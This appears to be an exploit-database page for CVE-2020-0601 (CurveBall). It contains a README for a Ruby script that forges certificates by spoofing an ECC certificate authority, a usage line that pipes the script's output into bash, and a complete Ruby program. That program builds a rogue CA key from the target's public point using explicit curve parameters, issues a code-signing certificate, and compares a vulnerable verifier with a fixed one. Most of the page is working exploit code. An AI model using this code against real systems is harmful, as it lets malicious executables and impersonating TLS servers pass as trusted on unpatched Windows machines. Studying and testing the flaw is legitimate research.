
POC details: 51d4c4b80f9a43cd58d9e412f494e97a024ba44c

Source
Related vulnerability
Title: Microsoft Windows CryptoAPI trust management vulnerability (CVE-2020-0601)
Description: Microsoft Windows CryptoAPI is a cryptographic facility that Microsoft added to the Windows operating system. As a key foundation for data encryption and decryption, CryptoAPI supports synchronous and asynchronous key-based cryptographic processing as well as the management of digital certificates in the operating system. The method that Microsoft Windows CryptoAPI (Crypt32.dll) uses to validate elliptic-curve cryptography (ECC) certificates has a trust management vulnerability. An attacker can exploit it by using a spoofed code-signing certificate to sign a malicious executable. The following products and versions are affected: Micr
Description
CurveBall CVE exploitation
Introduction
# CVE-2020-0601 : CurveBall CVE exploitation

This Ruby script can be used to spoof a legitimate certificate authority and generate a certificate that will be considered valid by Windows computers affected by the CurveBall vulnerability (CVE-2020-0601).

You need the certificate of the ECC certificate authority you want to spoof (only its public key is used; the CA's private key is never needed).
Then run the script with a command like the following:
`ruby gen-rogue-cert.rb -in=ca.crt -subj="/C=France/ST=IleDeFrance/L=Paris/O=YoannDqr" -out=cert_rb.p12 -exe=DoNotDebugMe.exe -type=exe -sh | bash`

The trailing `| bash` executes whatever the script prints; drop it to inspect the generated command first.

The script can generate certificates for signing PE files as well as certificates for TLS servers.

## List of options 
- -in   : mandatory ; path to the trusted CA certificate to spoof
- -out  : mandatory ; path where the generated certificate is stored
- -type : mandatory ; 'exe' for a code-signing certificate or 'tls' for a server and client authentication certificate

- -exe  : optional ; name of the executable to sign
- -subj : optional ; subject of the generated certificate, as an OpenSSL-style DN (note that C is meant to be a two-letter country code, e.g. FR)

- -sh   : optional flag ; print only the bash command needed to use the certificate (e.g. the command line to sign an executable)


## Technologies Used ##
The script is based on the Ruby OpenSSL library https://github.com/ruby/openssl.

It generates a fake CA from the public key found in the input certificate. This is the CVE-2020-0601 flaw itself: the fake CA keeps the target's public key but ships explicit curve parameters (a generator of the attacker's choosing) together with a private key that matches that generator, and the vulnerable CryptoAPI matched the trusted CA by public key alone without checking the parameters.
It then generates a certificate signing request and signs it with the fake CA certificate.
The resulting certificate is packed into a PKCS#12 file and saved on your computer.

To add further certificate types, as was done for TLS certificates, modify the extensions of the certificate generated from the certificate signing request:

- Code signing : `csr_cert.add_extension(extension_factory.create_extension('extendedKeyUsage', 'codeSigning'))`
- TLS certificate : `csr_cert.add_extension(extension_factory.create_extension('extendedKeyUsage', 'serverAuth, clientAuth'))`
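
As an added example (this is not the repository's gen-rogue-cert.rb, whose source is not shown on this page), the Ruby program below carries out the steps listed above with the same Ruby OpenSSL library: it derives a rogue CA key from a target certificate's public key, issues a code-signing certificate from it, and then models the two verifier behaviours so that the chain is accepted only by a CurveBall-vulnerable check. Everything is constructed in memory: the self-signed "trusted root" stands in for the certificate you would pass with `-in`, the function and variable names are this example's own, and `vulnerable_chain_ok?` / `fixed_chain_ok?` are a simplified model of CryptoAPI's behaviour, not Windows code.

```ruby
require 'openssl'

# Added example; NOT the repository's gen-rogue-cert.rb. It builds the CurveBall
# (CVE-2020-0601) rogue key the script relies on, entirely in memory: a constructed
# self-signed P-256 "trusted root" stands in for the CA cert passed with -in, and
# the rogue CA then issues a code-signing leaf.

CURVE  = 'prime256v1'
DIGEST = 'SHA256'

def build_cert(subject:, pubkey:, issuer_key:, issuer_cert: nil, serial: 1, exts: [])
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = serial
  cert.subject    = subject.is_a?(String) ? OpenSSL::X509::Name.parse(subject) : subject
  cert.issuer     = issuer_cert ? issuer_cert.subject : cert.subject
  cert.public_key = pubkey
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 86_400
  ef = OpenSSL::X509::ExtensionFactory.new(issuer_cert || cert, cert)
  exts.each { |oid, value, critical| cert.add_extension(ef.create_extension(oid, value, critical)) }
  cert.sign(issuer_key, OpenSSL::Digest.new(DIGEST))
  cert
end

# Core of CVE-2020-0601. We cannot recover the CA's private key d for its public
# point Q = d*G, so we keep Q and ship *explicit* curve parameters whose generator
# is G' = d'^-1 * Q for a d' of our choosing (default 1, so G' = Q). Then
# d' * G' == Q, and a verifier that takes the curve parameters from the presented
# certificate instead of from the trusted root accepts our signatures.
# Same p, a, b, order and cofactor as the real curve; only the generator changes.
def rogue_ec_key(target_pub, d_prime = 1)
  legit_group = target_pub.group
  n       = legit_group.order
  dp      = OpenSSL::BN.new(d_prime)
  q       = target_pub.public_key                 # EC::Point Q on the real curve
  g_prime = q.mul(dp.mod_inverse(n))              # G' = d'^-1 * Q

  rogue_group = OpenSSL::PKey::EC::Group.new(legit_group)              # copy of the curve
  g_on_rogue  = OpenSSL::PKey::EC::Point.new(rogue_group, g_prime.to_bn(:uncompressed))
  rogue_group.set_generator(g_on_rogue, n, legit_group.cofactor)
  rogue_group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE           # encode parameters, not the curve OID

  # Hand-assemble an RFC 5915 ECPrivateKey. This works on both OpenSSL 1.1 and 3.x,
  # where EC key objects can no longer be mutated after creation.
  der = OpenSSL::ASN1::Sequence.new([
    OpenSSL::ASN1::Integer.new(1),
    OpenSSL::ASN1::OctetString.new(dp.to_s(2).rjust(n.num_bytes, "\x00")),
    OpenSSL::ASN1::ASN1Data.new([OpenSSL::ASN1.decode(rogue_group.to_der)], 0, :CONTEXT_SPECIFIC),
    OpenSSL::ASN1::ASN1Data.new([OpenSSL::ASN1::BitString.new(q.to_octet_string(:uncompressed))], 1, :CONTEXT_SPECIFIC)
  ]).to_der
  OpenSSL::PKey::EC.new(der)
end

# Stand-in for the real trusted root (constructed here; the script reads it from -in).
def make_legit_ca
  key = OpenSSL::PKey::EC.generate(CURVE)
  [key, build_cert(subject: '/CN=Constructed Test Root CA', pubkey: key, issuer_key: key,
                   exts: [['basicConstraints', 'CA:TRUE', true]])]
end

# Spoofed CA: same subject and same public point as the target, rogue private key.
def spoof_ca(target_cert, d_prime = 1)
  key = rogue_ec_key(target_cert.public_key, d_prime)
  [key, build_cert(subject: target_cert.subject, pubkey: key, issuer_key: key,
                   serial: target_cert.serial, exts: [['basicConstraints', 'CA:TRUE', true]])]
end

# Leaf for signing a PE, issued by the rogue CA (the README's 'exe' type).
def issue_code_signing_leaf(ca_key, ca_cert, subject)
  key = OpenSSL::PKey::EC.generate(CURVE)
  [key, build_cert(subject: subject, pubkey: key, issuer_key: ca_key, issuer_cert: ca_cert,
                   serial: 0x1337, exts: [['extendedKeyUsage', 'codeSigning', false]])]
end

def point_bytes(cert)
  cert.public_key.public_key.to_octet_string(:uncompressed)
end

# Simplified model of the vulnerable behaviour: the presented issuer is matched to
# the trusted roots by public-key bytes alone, and the leaf signature is then
# checked with the parameters the *presented* issuer carries, i.e. our G'.
def vulnerable_chain_ok?(leaf, presented_issuer, trusted_roots)
  return false unless trusted_roots.any? { |root| point_bytes(root) == point_bytes(presented_issuer) }
  leaf.verify(presented_issuer.public_key)
end

# Fixed behaviour: verify with the trusted root's own key (named curve, real G).
def fixed_chain_ok?(leaf, trusted_roots)
  trusted_roots.any? { |root| leaf.verify(root.public_key) }
end

if __FILE__ == $PROGRAM_NAME
  _legit_key, legit_ca = make_legit_ca
  rogue_key, rogue_ca  = spoof_ca(legit_ca)
  _leaf_key, leaf      = issue_code_signing_leaf(rogue_key, rogue_ca, '/CN=DoNotDebugMe.exe signer')
  puts "rogue private key d' = #{rogue_key.private_key.to_i}"
  puts "vulnerable verifier accepts leaf: #{vulnerable_chain_ok?(leaf, rogue_ca, [legit_ca])}"
  puts "fixed verifier accepts leaf:      #{fixed_chain_ok?(leaf, [legit_ca])}"
end
```

The rogue key's public point is byte-for-byte the target CA's, which is why a check that matches the cached root by public key alone is fooled; its signatures are meaningless under the genuine generator, which is why verifying against the trusted root's own key rejects them. To produce the .p12 the README describes, hand the leaf key, the leaf certificate and the rogue CA certificate to `OpenSSL::PKCS12.create`.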
File snapshot

[4.0K] /data/pocs/51d4c4b80f9a43cd58d9e412f494e97a024ba44c
├── [1.1K] ca.crt
├── [5.7K] gen-rogue-cert.rb
└── [1.8K] README.md

0 directories, 3 files